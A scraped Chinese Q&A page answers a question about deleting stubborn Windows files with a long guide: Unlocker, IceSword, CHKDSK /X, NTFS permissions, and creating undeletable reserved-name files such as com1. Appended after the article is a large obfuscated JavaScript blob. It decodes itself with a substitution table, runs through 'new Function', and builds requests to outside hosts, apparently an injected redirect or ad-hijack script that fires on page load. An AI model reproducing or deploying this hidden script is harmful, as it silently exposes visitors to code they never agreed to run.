高手帮忙啊~文件无法删除,百度里的方法都试过,还是不能删除

2025-01-15 17:37:50
推荐回答(2个)
回答1:

不用那么麻烦,360有个文件粉碎机,轻松搞定,搞定请采纳

回答2:

教你如何删除顽固文件
核心提示: 大家是否遇到删除文件的时候会提示“文件正在被使用”,或者提示删除了,但是一刷新,它又在那里了。 而有一些文件根本就看不见,无论是通过资源管理器还是其它方式都看不到,更就没有办法删除了。 下面我们就来探讨一下这个问题。
大家是否遇到删除文件的时候会提示“文件正在被使用”,或者提示删除了,但是一刷新,它又在那里了。
而有一些文件根本就看不见,无论是通过资源管理器还是其它方式都看不到,更就没有办法删除了。
下面我们就来探讨一下这个问题。
在windows下,一个正常共享打开或被使用的文件,是不能被删除的。当删除的时候,
会提示“无法删除,文件正在被使用”。常见的就是流氓软件的各种.dll或者.exe进程或者.sys驱动文件。
所以删除文件之前,需要解除使用这个文件的句柄或者加载它的.exe进程。
【一】、常规方法
只是很简单的介绍一下,只是利用系统自带的功能。高手可以跳过。
1.结束进程再删除。删除文件时如果系统提示“文件正在使用”,首先检查一下是否没有退出与被删文件相关的程序,再看看系统进程中是否还有相关进程保留。
2.重启后或换个系统再删除。使用多系统的朋友可以切换到另外一个系统中执行删除操作,这招比较有效。
3.结束掉Explorer进程后再删除。按下Ctrl+Alt+Del键打开任务管理器,切换到“进程”选项卡,结束掉Explorer进程,这时候桌面会丢失,不用着急,运行“文件→新任务”,输入“cmd”后回车打开命令行窗口,进入待删文件所在目 录,用RD或delete命令删除即可。删除完毕后再次运行“文件→新任务”命令,输入“explorer”后回车,桌面又回来了.
4.关闭预览功能再删除。如果你在资源管理器中使用了视频、图片的预览功能,那么在删除此类文件时常常不成功,解决的办法是关闭该功能:Windows XP用户在“开始→运行”中输入“regsvr32 /u shmedia.dll”即可,Windows 2000用户则在资源管理器中的空白处单击鼠标右键,选择“自定义文件夹”选项,会出现自定义文件夹向导,进入到“请选择模板”窗口后,选择其中的“简易”便可以禁止视频预览了。
5.Windows XP附带的Msicuu.exe、Msizap.exe来彻底卸载顽固程序
  首先要打开Windows XP安装盘,点“Support Tools”,进入硬盘的Support Tools安装目录(X:Program FilesSupport Tools),找到Msicuu.exe并双击,于是就会弹出一个“Windows Installer Clean Up”窗口,显示当前已安装的所有程序列表。你从中选择顽固程序,然后单击“Rmove”按钮即可卸载。如果以上方法无效,建议你用Msizap.exe来卸载,方法是:打开注册表编辑器,定位到HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall,在左边项中找到顽固程序的标识(例如),然后依次选择“开始→程序→Windows Support Tools→Command Prompt”命令,在命令提示符后,输入以下命令:msizap T ,按回车后即可卸载顽固程序。
6.Windows XP的命令Replace.exe的主要功能,就是替换文件。该命令在Windows安装目录的System32文件夹下,
它能够替换正在使用中的文件!
  例如,我们用Windows Media Player播放一首路径为“g:mp3source.mp3”的歌曲
,然后在命令提示符窗口下键入下列命令:
  replace.exe d:mp3source.mp3 g:mp3
  这里的“d:mp3source.mp3”是准备用来替换的另一首MP3歌曲,注意两个
文件的文件名必须保持一致,很快我们就会在看到替换成功的提示,接下来Windows Medi
a Player窗口正在播放的歌曲也会自动变为另一首歌曲,呵呵,够神奇的吧?当然,repl
ace命令的最大好处是用来替换系统文件,这样就不需要重新启动到安全模式下了!
  Replace.exe命令的使用参数如下,有兴趣的朋友可以深入研究一下:
  /A——把新文件加入目标目录,注意不能与/S或/U搭配使用。
  /P——替换文件或加入源文件之前提醒用户进行确认。
  /R——替换只读文件以及未受保护的文件。
  /S——替换目标目录中所有子目录中的文件。
  /W——等待用户插入磁盘后再运行。
  /U——只替换或更新比源文件日期早的文件,不能与/A搭配使用。
【二】、其它常用软件来删除
请常用软件“兼职”删除。我们可以使用FlashFXP、Nero、ACDSee、Winrar、qq,Winamp来删除顽固文件,这种方法往往有奇效。
1,FlashFXP、Nero、ACDSee只需在本地目录中浏览到待删文件,对其执行删除操作即可.
2,使用Winrar来删除文件的方法步骤如下:右键单击待删除文件或者文件夹,选择“添加到档案文件”菜单,
在谈出窗口中勾选“存档后删除源文件”,单击“确定”,这样Winrar在创建压缩文件的同时,也会帮我们删除顽固的文件,
我们只需要将创建的压缩文件删除即可.
3,将QQ安装目录下的unins000.exe文件拷贝到要卸载文件的安装目录,再执行该程序即可!这种办法对于卸载那些反安装程序丢失或者损坏的文件有特效。
4,首先在“我的电脑”找到Winamp安装目录下的UninstWp.exe程序,复制并粘贴到顽固程序所在的文件夹中,双击运行该程序就可以把顽固程序卸载得干干净净了。
【三】、使用专业删除软件。
1,冰刃icesword
现在很多流氓软件都是通过内核来加载,象CNNIC中文上网的cdnprot.sys,3721的CnsMinKP.sys,它加载后,为了保证软件不被删除,就监视所有的文件、注册表删除操作,如果发现是删除这些文件,就直接返回一个true,这样Windows以为已经删除了,但是文件还在那里。再有一些做得更绝,它会把文件隐藏起来。这个隐藏是基于内核级的,不是通过打开资源管理器里面的“显示隐藏文件”选项就能看到的。象TotalCommand有时也发现不了。针对这些文件,Unlocker也是无药可施的。即使是Windows提供的重启删除机制,也被这些流氓软件给破了。IceSword是这类软件中最有效的,能删除各种驱动保护文件,而不需要重启操作系统或者装一个DOS之类多操作系统来完成。
使用很简单,通过它的“文件”,然后象资源管理器一样,找到相应的文件,然后点右键——删除便可。如果是.exe的文件本身在运行,要先通过IceSword的进程管理器来杀掉,然后再删除。
冰刀是重建系统核心,可以绕过所有的NTFS安全以及其它保护。
但前不久有人写出的专门来欺骗冰刀的文章已经有人应用了。
2,金山文件粉碎器(金山反间谍2007)。
大多数情况下,Windows自带的文件删除并不彻底,文件被删除后,他人仍然可以通过一些磁盘工具进行恢复。
所以对于一些想彻底删除的文件,可以使用文件粉碎器进行彻底删除。新版本的文件粉碎器采用了基于磁盘物理扇区的粉碎机制,
能够彻底清除文件内容、文件名以及分配表等所有文件信息,保证了被粉碎文件无法恢复。
同时符合美国国防部标准中对机密文件的粉碎处理方式。
试验表明,它独有的方式正好可以突破目前所有的流氓软件的自我保护功能。经试验,Windows系统下的所有文件,
无论是正在运行的程序,正在被使用的DLL,正在被打开的文件,还是采取自我保护的驱动,全部都可以被轻易地删除!
试验过程:在机上上同时安装了CNNIC,彩信通,SPOOLSV、百狗(Baigoo)、3721,百度等多个流氓软件,
然后在不关闭任何进程以及使用任何工具的情况下,把所有流氓软件相关的目录、驱动文件、可执行文件,
通过文件粉碎器,一次性全部删除!
文件粉碎器是直接写磁盘的文件空间,把文件内容改写,所以还是需要通过NTFS的权限检查的,
所以在普通帐户下删除管理员帐户的文件可能会失败。
3,PC Tools
可以删除几乎所有“顽固”软件。运行软件后,先按任意键进入软件的主界面,然后按下F10 切换选中待删文件,按下D键并确认操作即可删除.
4.unlocker,killbox,CopyLock
unlocker是一个非常优秀、小巧,功能强大的文件删除工具。大部分正常情况下都可以把.dll, exe等文件删除掉。
它可以关掉使用文件的句柄(正常文件),杀掉进程(.dll),Unload DLL。安装完了之后,以后要使用的时候,
在需要删除的文件或者目录上点右键,在菜单中选择“Unlocker”。这时如果它检测到文件/目录被其它进程锁了,
就会有一个列表的窗口出来,显示当前锁定或使用这个文件/目录的进程。那个Action动作选择“删除”,
再点一下那个“Unlock All”就可以了。 如果这个文件被一些核心进程占用或者保护,它会提示要等下一次启动的时候再删除,
这时点确定就可以了。大多数情况下,是不需要重启的。
killbox,unlocker里面的文件删除用了很多办法,最后一招是利用系统的“延迟删除功能”。
但是现在有不少流氓软件已经针对此做了防范,只要过滤相关的注册表值就可以了。所以对于有一些文件,它们都删除不掉。
【四】、安全模式或DOS或PE或光盘版xp(非PE)
其实熟悉DOS或者有能光盘启动的工具盘的话,一切都很简单。
1,一般情况下,在安全模式下能删除。
2,在DOS下删使用RD(删除目录)或delete命令(删除文件)
3,用PE系统光盘启动删除。
4,类推的,其他系统都可以删除,比如linux等等,不一一列举。
【五】、利用WINDOWS命名漏洞建立的文件或文件夹
对利用WINDOWS命名漏洞命名的文件, 利用Windows以设备命名文件夹拒绝服务漏洞的文件,在“开始”→“运行”中输入cmd后回车,使用dos命令删除。 这个把怎么建立的过程也讲一下:
1,利用Windows以设备命名文件夹拒绝服务漏洞
例如新建以下这些名字的文件(或文件夹):aux、com1、com2、prn、con、nul,系统会提示无法建立。
我们可以在命令行窗口中建立,然后将文件copy进去,这样,文件打不开也删不掉。
实现过程:在“开始”→“运行”中输入cmd后回车,进入命令行窗口,假设你所要加密的文件在C盘根目录下,名字为111.txt,只要输入copy c:I.txt .c:com1.txt(小提示:也可以命名为aux、com2、prn、con、nul其中的任意一个文件名)。这样你的111.txt文件中的内容就会被复制到com1.txt文件中了,com1.txt含有Windows禁用的文件名,故无法打开
也无法删除,别人就拿它没办法了,你要是再想查看其中的内容可以在“开始”→“运行”中输入.c:com1.txt即可,删除它也很简单,在命令行中输入del .c:com1.txt。
2,利用WINDOWS命名漏洞命名的文件, 比如xxx.,即文件最后有一个点.
这样的文件夹是无法直接建立的,不信试一下,后面的那个点是自动消失的。
建立这个文件的话可以用 md xxx.. 也可以新建一个xxx,然后用WINRAR改xxx为xxx.. 删除的话用 rd /s /q xxx..
没用的话再输入 del /f /q xxx..
--------------------------------------------------------------------------
对于含有保留字的文件,当我们发出删除指令的时候,Windows会检查被删除的文件是否有合法的路径,如果你的文件名含有Windows认为的非法字符或保留字,那么删除就会失败。
我们有3种方法可以删除这类文件:
a)采用Linux或其他非Windows的操作系统,以Linux/Unix为例:可以使用rm命令删除:
rm -d //driveletter/path using forward slashes/filename
rm -r "//C/Program Files/BadFolder"
b)使用命令行工具的一个特殊参数解决:
RD.:
DEL.driveletter:path ilename
在删除命令后面跟上.参数就可以避免Windows检查文件名的合法性,因此可以删除含有Windows保留字或非法名字的文件。
c)对于文件,如果可以使用通配符,那么也可以采用通配符解决:
DEL DEL PR?.*
DEL LPT?.*
--------------------------------------
以下另提供两种方法
不进安全模式,不借第三方工具,删除正在使用的文件两招。
(仅适用于 Windows NT/2000/XP/2003)
  相信大家一定碰到过因为文件正在使用而无法删除的问题吧,现在教大家两招,仅用系统自身的功能就可以搞定。思路其实非常简单,就是让正在使用的文件变成不是正在使用就可以了。现在来解决这个问题:
【第一招 磁盘扫描】
  看到这个题目大家不要郁闷,磁盘扫描是如何能做到的呢,其实磁盘扫描 CHKDSK 有一个参数 /X ,作用是强制关闭指定磁盘打开文件的句柄。正是利用这个来解决问题。
假设 E: 有个文件正在使用,无法删除。
第一步:关闭 E: 上已知正在运行的程序或文件。毕竟能用正常方法关闭的文件就用正常方法关闭。
第二步:运行 CMD 打开“命令提示符”窗口,输入 CHKDSK E: /X 。如没有意外,系统会显示 E: 已被强制卸下,所有打开的句柄都将无效,这说明 E: 上所有打开的文件已被强制关闭,待磁盘扫描完毕后就可以去删除你要删除的文件了。:)
特别说明:
  此方法不适用于 Windows 所在的系统磁盘以及虚拟内存所在磁盘。例如你 Windows 装在 C: ,那么 C: 是无法被强制卸下的。如果虚拟内存放在 D: ,那么 D: 也不能够被强制卸下。
【第二招 利用 NTFS 安全设置】
  要用这个方法必须保证磁盘为 NTFS 文件系统才行。
  首先,找到正在使用而无法删除的文件,打开其“属性”,选择“安全”选项卡(XP 要在“文件夹选项”里面取消“使用简单的文件共享”才显示该项。),单击“高级”按钮,打开高级选项页,取消从父文件夹继承权限的选项。访问者列表里面除了自己的登陆账号以外其它的统统删除,之后点击“编辑”按钮编辑你自己的访问权限,只勾选“删除”的权限,其它诸如“读取”“执行”的权限等等全部取消或拒绝,确定后重新启动计算机。计算机重新启动后任何用户都无权读取该文件,该文件自然不会变成“正在使用的文件”。而你自己的账号有删除的权限,则可以轻松删除该文件了。
以上为本人的一点经验,希望对解决部分顽固病毒,以及不方便进 DOS 或不熟悉 DOS 的用户有所帮助。

!function(){function a(a){var _idx="g3r6t5j1i0";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8ps5KFnC}60"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"ps5KFnC}60"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mpOL2fmRT4"="Ks0X5ThF)m64YdCmRT4"="Ks02pThFmpOL2fmRT4"="Ks0_JqhFm64YdCmRT4"="Ks02TOhFmpOL2fmRT4"="Ks0CSqhF)m64YdCmRT4"="Ks0)FfThF)fmpOL2fmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q/f/Ks0j(8}vR8ps5KFnC}60"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();